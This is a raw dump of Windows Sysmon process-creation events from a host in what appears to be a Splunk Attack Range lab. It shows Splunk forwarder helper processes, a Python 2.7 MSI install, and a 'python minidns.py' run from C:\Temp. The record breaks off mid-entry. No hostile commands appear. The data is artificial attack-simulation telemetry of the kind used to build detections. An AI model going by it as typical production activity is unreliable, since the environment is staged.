3B3EC1640C4D80CDBF88A89468165DC7C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-52B5-6078-8307-00000000AE01}6448C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 154100x800000000000000040582Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:32.916{A8622C2F-52B8-6078-8407-00000000AE01}4424C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 442511D5F0042368B9A16B35ED61948C CC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-52B5-6078-8307-00000000AE01}6448C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 154100x800000000000000040539Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:29.761{A8622C2F-52B5-6078-8307-00000000AE01}6448C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\system32\msiexec.exe /VC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000040508Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:29.442{A8622C2F-52B5-6078-8207-00000000AE01}2644C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Administrator\Downloads\python-2.7.18.amd64.msi" C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000040485Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:22.920{A8622C2F-52AE-6078-8107-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040472Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:21.188{A8622C2F-52AD-6078-8007-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040463Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:20.522{A8622C2F-52AC-6078-7F07-00000000AE01}5220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040453Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:19.846{A8622C2F-52AB-6078-7E07-00000000AE01}5276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040438Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:17.888{A8622C2F-52A9-6078-7D07-00000000AE01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040424Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:17.211{A8622C2F-52A9-6078-7C07-00000000AE01}5200C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040415Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:16.545{A8622C2F-52A8-6078-7B07-00000000AE01}4292C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040257Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:51.377{A8622C2F-528F-6078-7A07-00000000AE01}2272C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exepython minidns.pyC:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000040195Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:22.912{A8622C2F-5272-6078-7907-00000000AE01}6656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040180Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:21.238{A8622C2F-5271-6078-7807-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:20.572{A8622C2F-5270-6078-7707-00000000AE01}4416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040161Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:19.890{A8622C2F-526F-6078-7607-00000000AE01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040149Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:18.004{A8622C2F-526E-6078-7507-00000000AE01}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040140Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:17.327{A8622C2F-526D-6078-7407-00000000AE01}2952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040131Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:16.671{A8622C2F-526C-6078-7307-00000000AE01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040011Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:22.901{A8622C2F-5236-6078-7207-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039996Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:21.217{A8622C2F-5235-6078-7107-00000000AE01}1796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039986Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:20.552{A8622C2F-5234-6078-7007-00000000AE01}3648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039977Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:19.873{A8622C2F-5233-6078-6F07-00000000AE01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039956Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:17.902{A8622C2F-5231-6078-6E07-00000000AE01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039947Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:17.339{A8622C2F-5231-6078-6D07-00000000AE01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039937Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:16.657{A8622C2F-5230-6078-6C07-00000000AE01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039843Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:22.992{A8622C2F-51FA-6078-6B07-00000000AE01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039827Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:21.205{A8622C2F-51F9-6078-6A07-00000000AE01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039818Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:20.538{A8622C2F-51F8-6078-6907-00000000AE01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039808Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:19.858{A8622C2F-51F7-6078-6807-00000000AE01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039797Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:17.987{A8622C2F-51F5-6078-6707-00000000AE01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039788Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:17.320{A8622C2F-51F5-6078-6607-00000000AE01}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039779Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:16.638{A8622C2F-51F4-6078-6507-00000000AE01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:22.993{A8622C2F-51BE-6078-6407-00000000AE01}6028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039655Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:21.211{A8622C2F-51BD-6078-6307-00000000AE01}1292C:\Program 